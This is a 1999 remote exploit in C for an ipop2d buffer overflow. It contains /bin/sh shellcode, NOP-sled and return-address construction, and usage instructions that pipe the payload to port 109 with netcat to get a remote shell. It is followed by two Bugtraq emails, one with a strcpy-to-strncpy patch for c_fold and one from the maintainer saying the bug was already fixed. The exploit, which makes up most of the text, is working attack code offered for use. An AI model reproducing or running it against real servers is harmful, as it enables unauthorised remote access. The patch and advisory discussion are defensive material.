/* * Sekure SDI (Brazilian Information Security Team) * ipop2d remote exploit for linux (Jun, 02 1999) * * by c0nd0r <condor@sekure.org> * * (read the instructions below) * * Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr, * falcon, vader, c_orb, marty(nordo!) and minha malinha! * also to #uground (irc.brasnet.org) and #SDI (efnet), * guys at el8.org, toxyn.org, pulhas.org * * Sincere Apologizes: duke (for the mistake we made with the wu-expl), * your code rocks. * * Usage: * * SDI-pop2 <imap_server> <user> <pass> [offset] * * where imap_server = IMAP server at your box (or other place as well) * user = any account at your box * pass = the account's password * offset = 0 is default -- increase if it's necessary. * * Example: (netcat rocks) * * (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109 * * ---------------------------------------------------------------- * HOWTO-exploit: * * In order to gain remote access as user nobody, you should set * an IMAP server at your box (just edit the inetd.conf) or at * any other machine which you have an account. * * During the anonymous_login() function, the ipop2d will set the * uid to user nobody, so you are not going to get a rootshell. * ---------------------------------------------------------------- * */ #include <stdio.h> /* * (shellcode) * * jmp 0x1f * popl %esi * movl %esi,0x8(%esi) * xorl %eax,%eax * movb %eax,0x7(%esi) * movl %eax,0xc(%esi) * movb $0xb,%al * movl %esi,%ebx * leal 0x8(%esi),%ecx * leal 0xc(%esi),%edx * int $0x80 * xorl %ebx,%ebx * movl %ebx,%eax * inc %eax * int $0x80 * call -0x24 * .string \"/bin/sh\" * grab your shellcode generator at www.sekure.org */ char c0d3[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; main (int argc, char *argv[] ) { char buf[2500]; int x,y=1000, offset=0; long addr; char host[255], user[255], pass[255]; int bsize=986; if ( argc < 4) { printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n"); printf ( "usage: (SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n"); exit (0); } snprintf ( host, sizeof(host), "%s", argv[1]); snprintf ( user, sizeof(user), "%s", argv[2]); snprintf ( pass, sizeof(pass), "%s", argv[3]); if ( argc > 4) offset = atoi ( argv[4]); /* gimme the ret + offset */ addr = 0xbffff3c0 + offset; fprintf ( stderr, "0wning data since 0x%x\n\n", addr); /* calculation of the return address position */ bsize -= strlen ( host); for ( x = 0; x < bsize-strlen(c0d3); x++) buf[x] = 0x90; for ( y = 0; y < strlen(c0d3); x++, y++) buf[x] = c0d3[y]; for ( ; x < 1012; x+=4) { buf[x ] = addr & 0x000000ff; buf[x+1] = (addr & 0x0000ff00) >> 8; buf[x+2] = (addr & 0x00ff0000) >> 16; buf[x+3] = (addr & 0xff000000) >> 24; } sleep (1); printf ( "HELO %s:%s %s\r\n", host, user, pass); sleep (1); printf ( "FOLD %s\r\n", buf); } --------------------------------------------------------------------------------- Date: Thu, 3 Jun 1999 17:29:05 -0300 From: dumped <dumped@SEKURE.ORG> To: BUGTRAQ@netspace.org Subject: ipop2d buffer overflow fix This patch fixes the buffer overflow previously pointed by Thiago. diff -Nur imap-4.4.orig/src/ipopd/ipop2d.c imap-4.4/src/ipopd/ipop2d.c --- imap-4.4.orig/src/ipopd/ipop2d.c Thuu Jun 3 18:35:15 1999 +++ imap-4.4/src/ipopd/ipop2d.c Thu Jun 3 18:37:02 1999 @@ -10,7 +10,10 @@ * Internet: MRC@CAC.Washington.EDU * * Date: 28 October 1990 - * Last Edited: 13 July 1998 + * Last Edited: 3 June 1999 + * + * dumped (dumped@sekure.org) 3/Jun/99 : + * fixed a buffer overflow in c_fold() * * Copyright 1998 by the University of Washington * @@ -306,7 +309,8 @@ /* don't permit proxy to leave IMAP */ if (stream && stream->mailbox && (s = strchr (stream->mailbox,'}'))) { strncpy (tmp,stream->mailbox,i = (++s - stream->mailbox)); - strcpy (tmp+i,t); /* append mmailbox to initial spec */ + strncpy (tmp+i,t,sizeof(tmp) - strlen(stream->mailbox)); + /* append mailbox to initial spec */ t = tmp; } /* open mailbox, note # of messages */ --------------------------------------------------------------------------------- Date: Thu, 3 Jun 1999 14:02:59 -0700 From: Mark Crispin <MRC@CAC.WASHINGTON.EDU> To: BUGTRAQ@netspace.org Subject: Re: ipop2d buffer overflow fix This problem was fixed several months ago, and a CERT advisory issued. The fix is in the current distribution version. imap-4.4 is an old version.